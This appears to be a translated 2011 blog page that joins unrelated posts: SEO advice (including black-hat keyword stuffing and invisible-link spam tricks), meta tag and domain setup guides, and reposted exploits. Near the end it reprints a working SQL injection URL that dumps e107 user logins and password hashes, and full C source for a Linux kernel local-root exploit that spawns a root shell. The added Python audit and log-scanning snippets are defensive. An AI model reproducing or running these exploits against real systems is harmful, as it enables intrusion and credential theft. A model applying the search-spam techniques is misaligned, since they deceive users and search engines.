Monday, October 31, 2011

Black Hat SEO


With Black Hat SEO techniques, the number of visitors to a site can jump sharply. It is an effective approach, but not an ethical one. The main thing for those of you who have a website or blog is that many visitors come to it. When visitors crowd your site or blog, it becomes well known, which means it gets advertising more easily. The majority of internet users find the address of a site or blog through search engines such as Google and Yahoo, so getting to the top of the search engines is paramount.
Hence the term Search Engine Optimization (SEO). SEO is basically a technique for placing a site or blog at the top of the search results on search engines so that it attracts many visitors. There are many ways of doing it, from meta tags to adding unique content to the site or blog.
Black Hat SEO is also known as spamdexing. Using this technique is unethical because it simply chases a high score in search engines, while the site or blog does not necessarily present information that matches the keywords. The risk of using this technique is that the site or blog will be banned by search engines.

Keyword Stuffing

Keyword stuffing is a technique that floods a web page with the important words that search engine users look for, arranged in such a way that they do not disturb visitors to the site or blog. There are several ways of using this technique:
1. Invisible keywords. This is the most frequently used and easiest technique. It disguises the color of the keywords so that it becomes identical to the color of the site or blog itself. Search engines do not look at a site or blog by its visual appearance but by reading its source code (HTML), and then place it among the search results.
2. Invisible links. This is similar, but not identical, to the invisible keyword technique. It is done by placing hyperlinks on each period character (.) of the site or blog.
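Both tricks leave traces in the HTML source, so a site owner can audit pages for them, for example after a compromise that planted spam. The following is an added example, not part of the original post: the sample markup is constructed, the function and class names are illustrative, and it only understands inline colors (`style`, `color`, `bgcolor`) with assumed defaults of black text on a white page.

```python
import re
from html.parser import HTMLParser

NAMED = {"white": "#ffffff", "black": "#000000", "red": "#ff0000"}  # small subset
VOID = {"br", "img", "hr", "meta", "link", "input"}
PUNCT_ONLY = re.compile(r"[\s.,;:'\"-]+")


def norm_color(value):
    """Normalise an HTML/CSS colour to #rrggbb, or None if not understood."""
    v = value.strip().lower()
    v = NAMED.get(v, v)
    m = re.fullmatch(r"#([0-9a-f]{3})", v)
    if m:
        v = "#" + "".join(ch * 2 for ch in m.group(1))
    return v if re.fullmatch(r"#[0-9a-f]{6}", v) else None


def declared_colors(attrs):
    """Return (foreground, background) set on one tag; None where not set."""
    a = dict(attrs)
    fg = norm_color(a["color"]) if a.get("color") else None
    bg = norm_color(a["bgcolor"]) if a.get("bgcolor") else None
    for decl in (a.get("style") or "").split(";"):
        prop, _, val = decl.partition(":")
        prop = prop.strip().lower()
        if prop == "color":
            fg = norm_color(val) or fg
        elif prop in ("background-color", "background"):
            bg = norm_color(val) or bg
    return fg, bg


class HiddenSeoAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        # (tag, effective text colour, effective background); defaults are assumed
        self.stack = [("root", "#000000", "#ffffff")]
        self.link = None          # [href, collected text] while inside <a>
        self.findings = []

    def handle_starttag(self, tag, attrs):
        fg, bg = declared_colors(attrs)
        _, parent_fg, parent_bg = self.stack[-1]
        if tag not in VOID:
            self.stack.append((tag, fg or parent_fg, bg or parent_bg))
        if tag == "a":
            self.link = [dict(attrs).get("href") or "", ""]

    def handle_endtag(self, tag):
        if tag == "a" and self.link is not None:
            href, text = self.link
            if href and PUNCT_ONLY.fullmatch(text):
                self.findings.append(("punctuation-link", text.strip(), href))
            self.link = None
        # Pop back to the matching open tag, tolerating unclosed elements.
        for i in range(len(self.stack) - 1, 0, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        if self.link is not None:
            self.link[1] += data
        _, fg, bg = self.stack[-1]
        text = data.strip()
        if text and fg == bg:
            self.findings.append(("same-colour-text", text, fg))


def audit(html):
    """Return findings as (kind, text, detail) tuples in document order."""
    parser = HiddenSeoAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: one link on a period, one block of white-on-white text.
SAMPLE = """<html><body bgcolor="#FFFFFF">
<p>Tourism information about Bali<a href="http://spam.example/a">.</a></p>
<div style="color:#fff; background-color: white">cheap hotel bali hotel bali villa</div>
<p style="color: #333">Contact us <a href="/contact">here</a>.</p>
</body></html>"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

Colors set through external stylesheets or scripts are outside what this check sees, so a clean result covers inline styling only.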

Attach Meta Tags on Blogger

Meta tags are an important way of delivering information about a page to search engines. There are many meta tags in the HTML 4.0 standard from the World Wide Web Consortium, but only three are really used by search engines: description, keywords, and robots. There is too much to write in explaining meta tags, so I simply took the explanation from this address: http://darmananda.blogspot.com (the whole explanation is the original, without editing).

Meta Description Tag

The meta description tag is used to provide a general overview of the contents of your web page. The recommended size is no more than 200 characters. Try to make this description consist of the sentences located at the beginning of the web page in question. An example of the meta description tag is as follows:

Some search engines, such as Northern Light and Google, do not use the meta description tag as the description in their search results. What they use is the opening sentences found on the page. That is why I recommend that you use the content of the meta description tag as the opening sentence. If the very beginning of your web page is a menu, then the description displayed in the Northern Light search results looks like this:
Home | Products and Service | Contact Us | About Us ... welcome to our online store, the best place on the web to ...

Meta Keyword Tag

The meta keywords tag is very important because it determines which keywords lead to the web page on search engines. The basic syntax of the meta keywords tag is as follows:
or, as some write it, with comma separators:
Both work the same way and make no difference to the search engines. The purpose of the commas is to make the keywords easier to read. Note that you should not repeat a word more than 3 times, because that will be considered spamming. An example of a wrong keywords meta tag is:
Here we can see that the word "bali" is repeated more than 3 times. The following example will not be considered spamming by search engines:
Equally important: do not use keywords that have nothing to do with the content of your web page. That will also be considered spamming. Suppose your website contains information on tourism in Bali; do not ever add "MP3" or "Britney Spears" as keywords just because they are favorite, much-sought-after keywords on the internet.

Meta Robots Tag

The main purpose of the robots meta tag is to specify which web pages may be indexed by a spider and which may not. This tag is very useful, especially if the website uses frames for navigation. Obviously we do not want the menus in the frame to be read by search engines. The basic format of the meta robots tag is as follows:
For example, if you want the spiders to read the main page and browse through all the links on it, add the following command:
With this command the spider will index your main page and schedule indexing of the other pages that can be reached via hyperlinks (). The following command instructs the spider not to index a web page and not to browse the links on it.

How to put meta tags on Blogger

Installing meta tags on Blogger is quite easy. First go to Edit HTML, then copy and paste the code below. Meta tag code is usually placed under the code <data:blog.pageTitle/></title>. Do not forget to change the code colored red below to match the description of your blog.

<meta content='Write description here' name='description'/>
<meta content='keyword1 keyword2 keyword3 ...' name='keywords'/>
<meta content='INDEX, FOLLOW' name='ROBOTS'/>

Good luck trying it out, and happy blogging.

SEO ++ Again


SEO stands for Search Engine Optimization, which means optimizing a website so that it is displayed on the first page, or near the top, of search engine results when someone types a search term into the search box.
For example, when someone opens the Google or Yahoo search engine and types the words they want to search for into the box, the search engine then displays a page containing a list of websites that match the words that person entered.
Below are some ways to get high rankings in search engines:
1. Titles and URLs
Titles and URLs are important not only for keeping the ads that appear relevant to your site; they also affect your ranking in search engines.
Examples:
- A page about car repair that is named "mobil.html" ("mobil" is Indonesian for car) will probably get a low ranking when someone searches for information about car repair. Rename the page to "reparasi_mobil.html" (car repair) and you will get a high ranking when someone looks for car repair content, because the name matches the content of your website.
- The first URL, www.domain.com/page, is better than the second URL, http://domain.com/page.php?newsid=1234583373. Why? Because the first URL is easier to read for robots.txt (one of the systems search engines work with) than the second URL.
2. Publish your site link
You can do this in various ways: by joining forums and putting your link in every post, by exchanging links, or by registering your blog with various blogger or site communities.
For example, I have listed my blog www.kordgitarrequest.blogspot.com on www.kumpulblogger.com and www.rumahblogger.com for indirect publicity; there you can also find out which sites or blogs have a high ranking and follow the ways they achieved a high ranking on search engines.

3. Register your site on search engines
Google and Yahoo are the most important.
Google: http://www.google.com/addurl
Yahoo: http://search.yahoo.com/info/submit.html
Like the MTV Powerful chart, which is always going up and down, so it is with search engines. Once you have registered your site on the search engines, you should concentrate more on the content of your website, be it updates, quality, or other things that will keep your ranking rising until it reaches the highest level.
Hopefully this is useful.

Drive the Search Engine to Your Website

Congratulations if your website is indexed in search engines! Maybe you submitted it manually (registering with the search engines by hand), or made use of a free submitter service such as http://www.submitexpress.com/.
However, having a website indexed in search engines is not enough. You have to try harder so that as many of your web pages as possible are indexed and each gets a good position in the search engine result pages.
There is a good technique (and of course a free one) which can be used to optimize the performance of your website. This popular technique leads the search engines to your web pages. Yes, do not wait too long for search engines to kindly browse your web pages. Now it is time for you to be the one who hands a task list to the search engines.
As a bonus, this technique is also a powerful trick if your website has not been indexed in Google: in less than a week your website is guaranteed to be indexed!

Types of URL List Files

First, get to know the types of files you will hand to the search engines:
* sitemap.xml (and its compressed form sitemap.xml.gz): the URL list file that you will later hand to the Google search engine.
* urllist.txt (and its compressed form urllist.txt.gz): the URL list file used to lead the Yahoo! search engine.
* ror.xml: a URL list file to be exchanged via syndication / RSS feed.
* sitemap.html: a URL list file that you serve to your visitors and keep in reserve for other search engines.

Create the List of URLs

Second, prepare a URL list file covering all your web pages. There is no need to panic if you do not know how to create an XML file, and no need to despair if you have hundreds of web pages to record. You can use a tool that generates the files mentioned above. You can try an online URL list creation service such as http://www.xml-sitemaps.com/, or install software for this purpose, for example GSiteCrawler (http://gsitecrawler.com/).

Upload the List of URLs to Web Hosting

Third, once you have the URL list files in these formats, upload all of them to your web hosting. Put the files in the main directory (for example, public_html). These are the files that search engine bots will refer to first when they visit your website (according to the format of the file).

Hand the List of URLs to Search Engines

In the last stage, specifically for the Google search engine, you can be more aggressive in offering your list of URLs (sitemap.xml). You do this by using the Google Webmaster Tools service. Log in to the service using your Gmail account ID. Fill in the data for your website, verify the website as shown there, and then submit the sitemap.xml file that you now have. Do not forget to use the features of Webmaster Tools to monitor the performance of your website.
With a similar technique, you can also hand the list of URLs (sitemap.xml) to MSN Live Webmaster Tools.

Setting Custom Domain In blogspot


Having a blog with a top-level domain name (without the blogspot, wordpress, multiply, etc. suffix) will certainly make our blog look more elite and classy, and will also make the name of our blog easier to remember. If you do not have a domain, you can buy a paid one. Once we have bought the domain, there are some things we must do so that the domain is attached to the website or blog we have, among them the DNS settings, name servers, and so on. Let us start the steps to customize this domain.

* SETTING DNS (DOMAIN NAME SERVER)
The first step is setting up DNS. Usually when we buy a domain there is an additional cost (about IDR 3000) to add the "Managed DNS" service. But if you do not want to pay, there are free services that let us manage DNS settings, such as dnspark.net. Here is a tutorial if you use the DNSPark service:
1. If you do not already have an account on DNSPark, you can register at https://www.dnspark.net/register.
2. If you have registered, please log in.
3. Select the menu "DNS Hosting" (on the left). Then select "Add Domains".
4. Tick the box "DNS Hosting - Free", then enter the domain name you have bought in "Enter new domain" (without the www).
5. Then click "Add Now".
6. If this succeeds, your domain name will appear in the "Domain List" (lower left corner).
7. Click your domain to make further settings.
8. In the "Type" dropdown select "CNAME".
9. In the "Alias Name" column fill in www (actually anything can be filled in, but the main one that should be filled in is "www").
10. Then fill in ghs.google.com as the destination name (for blogspot).
11. When you are done, click "Update All".
The DNS setup process is now complete.

* SETTING IN PUBLISHING BLOGGER
Now only the last step remains. The steps are as follows:
1. Log in to Blogger. Select the menu "Settings -> Publishing".
2. Then click the link Switch to: Custom Domain.
3. Then click the link Already own a domain? Switch to advanced settings.
4. Then fill in your blog name in "Your Domain" (use the www, for example www.kangnoval.com).
5. Then click "Save Settings".
That is all, finished. If all the settings were made correctly, your new domain will become active in approximately 1-24 hours, or even up to 48 hours, so just be patient.

Learning SEO is it necessary?

Learning SEO is fun, but also confusing: you need to learn what PageRank, Black Hat SEO, White Hat SEO, links, nofollow, dofollow, URLs, keyword selection, and SEO-friendly web design are. Why is it so complicated and such a headache, when the purpose of SEO is just to increase the visitors to our website? Is there any way other than SEO? There is, and it is no less powerful than SEO. What is it?
SEO (Search Engine Optimization) is an attempt to increase traffic from search engines (Google, Yahoo, MSN, and friends). SEO aims to have our website ranked high when people type keywords into the search engines.

Building Visitor Loyalty

Visitors who come to our website will come again another time if in their hearts they say "this website is good for me" or "this is the website I need". To attract visitors to come back another time, there are the following tips from Mas Cosa Aranda:
* Provide content that is informative, up to date, of good quality, and original.
* Provide something unique that is not found on other sites.
* Build interaction with visitors.

Quality content

This is the key element in building a community of website visitors. What if our website sells products, an electronics store for example? We can look at the website of Innovative Electronics Surabaya as an example. The website has not been optimized for SEO, including:
* The website is based on frames, which complicates things for spiders / crawlers.
* The links in the menu use pictures.
* There are no ALT and TITLE attributes on links and images.
* All pages have the same title, which is the name of the store or company.
Although it is not SEO-optimized, judging from the traffic shown in Alexa, the current web ranking of Innovative Electronics is not much different from that of this blog, tutorialgratis.wordpress.com, so I estimate that the Innovative Electronics website gets hundreds of visitors per day. The Innovative Electronics website also has a PageRank of 4.
PageRank (PR) is a measure, created by Google, of how important a web page is. The more other web pages link to a page, the higher its PageRank. Google combines the number of links and the quality of content to order websites in its search rankings. The lowest PR is 0 and the highest is 10.
At this writing, the tutorialgratis.wordpress.com blog is still new, but it already has about 1500 unique page views per day, 700-1000 unique visitors per day, and PageRank (PR) = 5. Thanks to the loyal visitors who have opened this blog; I look forward to your comments, suggestions, and criticism. Many senior bloggers visit. Thank you once again to you, the visitors of the tutorialgratis.wordpress.com blog.
Returning to the Innovative Electronics website: what are the strengths of its content?
* Each product is described in detail, not just with images.
* There are many articles, applications, and newsletters.
* More than 500 pages are indexed by Google and Yahoo.
Why does the Innovative Electronics website have PageRank (PR) = 4? Do a lot of pages link to the website?
Apparently not!
Enter link: http://www.innovativeelectronics.com/ on Google, and it turns out there is only one page that links to the website, namely a free blog at blogspot that has PR = 0. So where was the PR obtained from? If you have any ideas, please comment.

Comments, DoFollow or NoFollow?

Nofollow is an HTML attribute which instructs search engines not to consider a link when calculating the ranking of web pages. Without the nofollow attribute, a link is dofollow and can increase the page ranking of the link's target.
A blog or website whose comment links are nofollow is good from an SEO point of view, but today many people are looking for backlinks and prefer comments with the dofollow attribute. As a result, blogs with dofollow comment links get comments from many people. Nevertheless, the majority of Internet users do not notice whether a link is nofollow or dofollow. Usually the visitors who comment on your blog or website are attracted by its content.

Feeds and subscribing by email

A feed is a facility visitors use to find updated content. An example is the feed of this blog: http://tutorialgratis.wordpress.com/feed/
A feed can be optimized by registering it with FeedBurner or FeedBlitz. These two services also provide the facility to subscribe by email (newsletters). For example, you can subscribe by email to the articles in this blog by clicking the subscribe via email link. A confirmation email will be sent after you fill out the form. You can unsubscribe at any time, because there is an unsubscribe link at the bottom of each article sent by email.
By providing an email subscription service, you can build a loyal community of visitors to your blog.

Running SEO and Building a Community: Isn't That Good?

If the two techniques are carried out simultaneously, the result will be very satisfactory. See the blog CosaAranda.com, which applies SEO techniques (you can see the many links on its pages); this can also be tested by entering link: http://cosaaranda.com on Google. The Cosa Aranda blog is also building a community with dofollow links in comments, an email subscription service (number of subscribers: THOUSANDS), and original content.

Conclusion

Learning SEO is good, but the most important thing in building a community around a website or blog and increasing its visitors in the long run is the quality of its content.

Effectively searches on Google

You are probably used to searching with Google simply by typing in a word or phrase and clicking Search! Did you know that Google provides a variety of search techniques for getting optimal results? Here are some ways of typing search phrases on Google and the benefits you can get:
* define:term: to find a list of the meanings or definitions of a term. For example, type define:blog to find definitions of blog.
* n1 + n2: to perform arithmetic operations, where n is a numerical value. Use + for addition, - for subtraction, * for multiplication, / for division, ^ for exponentiation, and so on (check the complete list of operators at http://www.google.co...calculator.html). You can also perform complex calculations; for example, type 2 * 100 / 4 and Google will display 50 as the result.
* search_phrase filetype:ext: to limit the search results to the given file type. For example, type tutorial presentation filetype:pdf to find presentation tutorials in PDF format. Try repeating the search with other file extensions to see the difference (e.g. xls or doc).
* n currency1 in currency2: to convert currency at the exchange rate. For example, type 10 USD in EUR, or 10 USD in IDR to calculate the value of US$10 (USD) in Rupiah (IDR).
* books book_topic: to find links to sites that present information related to the topic of the book. For example, type books how to assemble a pc to get information on books about assembling a PC.
* movie:search_phrase: to search for movie reviews. For example, type movie:love and it will display a list of reviews of films titled or associated with love (actors, locations, and so on).
* site:site.com: to display the entire list of a site's web pages indexed by Google. For example, type site:smitdev.com to see a list of smitdev web pages.
* link:site.com: to check the list of sites that link to the site searched for. For example, type link:smitdev.blogspot.com to see a list of sites that refer to the SmitDev blog.

How To Make Money With The Keyword List

All right people, a nice SEO article this time: Make Money With AdSense and This Keyword List? Hardly.

Sure. Everyone who is looking here knows what AdSense does. It pays publishers for clicks on placed sponsored ads. You put a bunch of ads on your page and then rush to the bank to count your money, right? AdSense is the magic wand money maker.

Well, people, that isn't the case. AdSense isn't going to make you any money by itself. What is going to earn you money is traffic. In order to make any money, you need to have a good, quality web site that generates visitors. That is the rule of the net and it is no different with AdSense. Without traffic, you are doomed to make 5 cents a month.

Make Money Through Traffic

I am not talking about fake traffic either. Traffic Swarm and the rest of the robotic, automatic page rotators and surfers aren't going to get customers clicking through your website. Most people let those auto surf programs run while they go to sleep. There isn't anyone there to click anything. There is also the small problem that those things are against Google's TOS (Terms of Service), and they will probably kick you out if they catch you. (My secret opinion is that if you get banned from AdSense, you will probably get a penalty in the Google Index too. That's double pain for your cheating efforts. You won't even generate a click. That's not good business at all.)

So, if you want your AdSense projects to generate extra money, you are going to have to go through the same process as everyone else trying to make it online. There are 5 things that you have to do to get noticed by search engines:

1) You have to update your site daily.
2) You have to submit your site to listings, directories and search engines.
3) You have to visit forums and blogs and post the night away.
4) You have to accumulate backlinks to your site.
5) And mostly, you have to write some good, sticky content. (What good is it to get 5 new visitors to your site if they don't come back?)

If you don't have the time to do some hard work, you might as well do something else. How about pet care? That isn't too mentally taxing. Selling Avon or something might be more for you. The truth is that there are no successful websites online that don't have hundreds (if not thousands) of man/woman hours behind them. Even getting a mere 5 new visitors a day is a major success in the beginning. (I can remember being excited that 15 unique visitors were on my first website. People I didn't pay to be there. Not customers, just visitors. Today, if I only got 15 orders in any particular day, I would go into a major panic.) The only way to make it is to pay your dues.

So How Do I make Money With The List? :)

Well, if you want to make money with the list alone, you have to find a bunch of suckers, tell them that they will be rich if they give you 13 dollars to buy it and then sell it to them. That's how you use the list for best results.

The only problem is that someone will get angry and post it online and the game is up. Does that mean it is useless? Well, it isn't worth $13, but it is still worth looking at in detail.

Tomorrow, I will tell you in detail how to take some of the terms, but not "Yahoo Domains," in the list and adapt them into your website. It is as obvious and easy as saying, "expensive, luxury cars" and "hybrid performance vehicles" 5 times really fast. Dealers welcome, sale, sale, sale...Free!!

e107 v7 CMS plugin - SQL Injection vulnerability


# Exploit Title: jbShop - e107 v7 CMS plugin - SQL Injection vulnerability
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: http://sourceforge.net/projects/jbshop/
# Tested on: [Linux/Windows 7]
#Vulnerable Parameter:
  
item_id=
 
  
##############################################################
PoC:
  
http://www.example.com//plugins/jbshop/jbshop.php?item_details=1&item_id=-1 union all select group_concat(user_loginname,0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--
 
  
##############################################################
www.websiteauditing.org
www.areyousecure.net
  
# Shouts to the Belegit crew


# 1337day.com 
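A site running this plugin can look for requests of this kind in its web server logs. The following is an added example, not part of the advisory: the log lines are constructed, in an assumed combined log format with addresses from documentation ranges, and the function names are illustrative. The digits-only rule it applies to `item_id` is the same allow-list a fix on the server side would enforce before the value reaches a query.

```python
import re
from urllib.parse import parse_qs, unquote

PLUGIN_PATH = "/plugins/jbshop/jbshop.php"

# Constructed sample lines (combined log format).
LOG_LINES = [
    '198.51.100.7 - - [31/Oct/2011:10:01:02 +0000] "GET /plugins/jbshop/jbshop.php'
    '?item_details=1&item_id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [31/Oct/2011:10:03:44 +0000] "GET //plugins/jbshop/jbshop.php'
    '?item_details=1&item_id=-1%20union%20all%20select%20group_concat('
    'user_loginname,0x3a,user_password),2,3%20FROM%20e107_user-- HTTP/1.1" 200 7421',
    '203.0.113.9 - - [31/Oct/2011:10:04:10 +0000] "GET /plugins/jbshop/jbshop.php'
    '?item_details=1&item_id=12%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [31/Oct/2011:10:05:00 +0000] "GET /plugins/jbshop/jbshop.php'
    '?item_details=1&item_id=-1 HTTP/1.1" 200 830',
    '198.51.100.7 - - [31/Oct/2011:10:06:00 +0000] "GET /index.php?item_id=abc'
    ' HTTP/1.1" 200 900',
    'not a log line',
]

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})\b')
SQL_TOKENS = re.compile(
    r"\b(?:union|select|from|group_concat|sleep|benchmark)\b|--|/\*|'|0x[0-9a-f]+",
    re.IGNORECASE,
)


def classify_item_id(value):
    """'ok' for a plain non-negative integer, otherwise why it was rejected."""
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    if SQL_TOKENS.search(value):
        return "sqli"
    return "malformed"


def scan(lines, plugin_path=PLUGIN_PATH):
    """Return (client, status, verdict, decoded value) for suspicious requests."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        # Split by hand: a target starting with "//" (as in the PoC URL) would
        # be mis-read as a host name by a generic URL parser.
        path, _, query = target.partition("?")
        path = re.sub(r"/{2,}", "/", unquote(path))
        if not path.endswith(plugin_path):
            continue
        params = parse_qs(query, keep_blank_values=True)
        for value in params.get("item_id", []):
            verdict = classify_item_id(value)
            if verdict != "ok":
                hits.append((client, int(status), verdict, value[:80]))
    return hits


if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print(hit)
```

A hit that was answered with status 200 deserves a closer look than one answered with an error, since the request was processed.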

Linux 2.6.3* x86_64 2010 local root exploit


/*
 *
 * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 * 0     _                   __           __       __                     1
 * 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
 * 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
 * 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
 * 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
 * 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
 * 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
 * 1                  \ \____/ >> Exploit database separated by exploit   0
 * 0                   \/___/          type (local, remote, DoS, etc.)    1
 * 1                                                                      0
 * 0  By CrosS                                                            1
 * 1                                                                      0 
 * 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
 *
 *
 * Tested on Linux 2.6.32.1 | Linux 2.6.33.2 | 2.6.32-24-generic | 2.6.37 (2010)
 * Result;
 * # id
 * uid=0(root) gid=0(root)
 *
 * 3xPl017 F0r x86_64 L1nuX k3rn3L ia32syscall 3muLatL47i0N (again) > x86_64 2.6.27+ ( not for 2.6.27 and below ! )
 *
 * If y0u g37 3Rr0R > ./1337
 * symbol table not available, aborting!
 * Process finished < O_o
 * C4usE 3xpl017 Re4dS "/proc/kallsyms" | "/proc/ksyms" , iF n07 4va1bl3! iT g1ve5 ErRoR O_o
 *
 * Upgrade the kernel ksplice without Reboo7, and the vulneRabiLitY is gonE !
 * 
 * Greetz: r0073r(1337day.com) ,r4dc0re ,Sid3^effects | & all members of r00tw0rm.com !
 */
 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int kernelmodecode(void *file, void *vma)
{
 commit_creds(prepare_kernel_cred(0));
 return -1;
}

unsigned long
get_symbol(char *name)
{
 FILE *f;
 unsigned long addr;
 char dummy;
 char sname[512];
 int ret = 0, oldstyle = 0;

 f = fopen("/proc/kallsyms", "r");
 if (f == NULL) {
  f = fopen("/proc/ksyms", "r");
  if (f == NULL)
   return 0;
  oldstyle = 1;
 }

 while (ret != EOF) {
  if (!oldstyle) {
   ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
  } else {
   ret = fscanf(f, "%p %s\n", (void **) &addr, sname);
   if (ret == 2) {
    char *p;
    if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
     continue;
    }
    p = strrchr(sname, '_');
    if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
     p = p - 4;
     while (p > (char *)sname && *(p - 1) == '_') {
      p--;
     }
     *p = '\0';
    }
   }
  }
  if (ret == 0) {
   fscanf(f, "%s\n", sname);
   continue;
  }
  if (!strcmp(name, sname)) {
   printf("ReS0lvEd sYmBoL %s 7o %p\n", name, (void *) addr);
   fclose(f);
   return addr;
  }
 }
 fclose(f);

 return 0;
}

 
static void docall(uint64_t *ptr, uint64_t size)
{
 commit_creds = (_commit_creds) get_symbol("commit_creds");
 if (!commit_creds) {
  printf("sYmb0l 74bl3 no7 ava1labLe, ab0r71n9! Fuck off\n");
  exit(1);
 }

 prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
 if (!prepare_kernel_cred) {
  printf("sYmb0l 74bl3 no7 ava1labLe, ab0r71n9! Fuck off\n");
  exit(1);
 }

        uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);

 printf("MaPpiNg at %lx\n", tmp); 

        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
                printf("mMap faUl7\n");
                exit(1);
        }
 
        for (; (uint64_t) ptr < (tmp + size); ptr++)
                *ptr = (uint64_t)kernelmodecode;
 
        __asm__("\n"
        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n");
 
        printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
        execl("/bin/sh", "bin/sh", NULL);
        printf("no /bin/sh ??fuck\n");
        exit(0);
}
 
int main(int argc, char **argv)
{
        int pid, status, set = 0;
        uint64_t rax;
        uint64_t kern_s = 0xffffffff80000000;
        uint64_t kern_e = 0xffffffff84000000;
        uint64_t off = 0x0000000800000101 * 8;
 
        if (argc == 4) {
                docall((uint64_t*)(kern_s + off), kern_e - kern_s);
                exit(0);
        }
 
        if ((pid = fork()) == 0) {
                ptrace(PTRACE_TRACEME, 0, 0, 0);
                execl(argv[0], argv[0], "2", "3", "4", NULL);
                perror("exec fault");
                exit(1);
        }
 
        if (pid == -1) {
                printf("foRk FaUlt(\n");
                exit(1);
        }
 
        for (;;) {
                if (wait(&status) != pid)
                        continue;
 
                if (WIFEXITED(status)) {
                        printf("Pr0ces5 fiNisHeD\n");
                        break;
                }
 
                if (!WIFSTOPPED(status))
                        continue;
 
                if (WSTOPSIG(status) != SIGTRAP) {
                        printf("ProCess rec3iveD si9naL: %d\n", WSTOPSIG(status));
                        break;
                }
 
                rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                if (rax == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                                exit(1);
                        }
                        set = 1;
                 //rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                }
 
                if ((rax == 11) && set) {
                        ptrace(PTRACE_DETACH, pid, 0, 0);
                        for(;;)
                                sleep(10000);
                }
 
                if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
                        printf("PTRACE_SYSCALL fault\n");
                        exit(1);
                }
        }
 
        return 0;
}


# 1337day.com 
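The header comment above notes that the code aborts when it cannot read the symbol table from /proc/kallsyms or /proc/ksyms. The following added example, not part of the posted code, checks from the defender's side whether the two symbols it looks up are visible with real addresses to the current user. The sample tables and addresses are constructed, the function names are illustrative, and /proc/sys/kernel/kptr_restrict is read only where the running kernel provides it.

```python
import os

# The two symbols the posted code resolves through get_symbol().
SENSITIVE = ("commit_creds", "prepare_kernel_cred")


def parse_symtab(text, names=SENSITIVE):
    """Return {name: address} for watched symbols; hidden addresses read as 0."""
    seen = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and len(parts[1]) == 1:
            addr, name = parts[0], parts[2]   # kallsyms: addr type name [module]
        elif len(parts) >= 2:
            addr, name = parts[0], parts[1]   # old ksyms: addr name [module]
        else:
            continue
        if name not in names:
            continue
        try:
            seen[name] = int(addr, 16)
        except ValueError:
            continue
    return seen


def assess(text, kptr_restrict=None):
    """Classify a symbol table as 'exposed', 'hidden' or 'absent'."""
    seen = parse_symtab(text)
    exposed = sorted(name for name, addr in seen.items() if addr)
    if exposed:
        verdict = "exposed"   # real kernel addresses readable by this user
    elif seen:
        verdict = "hidden"    # symbols listed, addresses zeroed out
    else:
        verdict = "absent"    # symbols not listed at all
    return {"verdict": verdict, "exposed": exposed, "kptr_restrict": kptr_restrict}


def assess_local(proc="/proc"):
    """Run the check as the current user; None if there is no kallsyms file."""
    try:
        with open(os.path.join(proc, "kallsyms")) as fh:
            text = fh.read()
    except OSError:
        return None
    try:
        with open(os.path.join(proc, "sys/kernel/kptr_restrict")) as fh:
            setting = int(fh.read().strip())
    except (OSError, ValueError):
        setting = None        # sysctl not present on this kernel
    return assess(text, setting)


# Constructed samples: addresses are made up for illustration.
OPEN_SAMPLE = """ffffffff8108c1a0 T commit_creds
ffffffff8108c4b0 T prepare_kernel_cred
ffffffffa0012000 t helper_fn\t[some_module]
"""
RESTRICTED_SAMPLE = """0000000000000000 T commit_creds
0000000000000000 T prepare_kernel_cred
"""
KSYMS_SAMPLE = "c0123456 commit_creds\nc0123999 other_symbol\n"

if __name__ == "__main__":
    print(assess_local())
```

Run it as an unprivileged account: a result of "exposed" means any local user can read the same addresses, and "hidden" is what a kernel with pointer restriction in effect shows.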

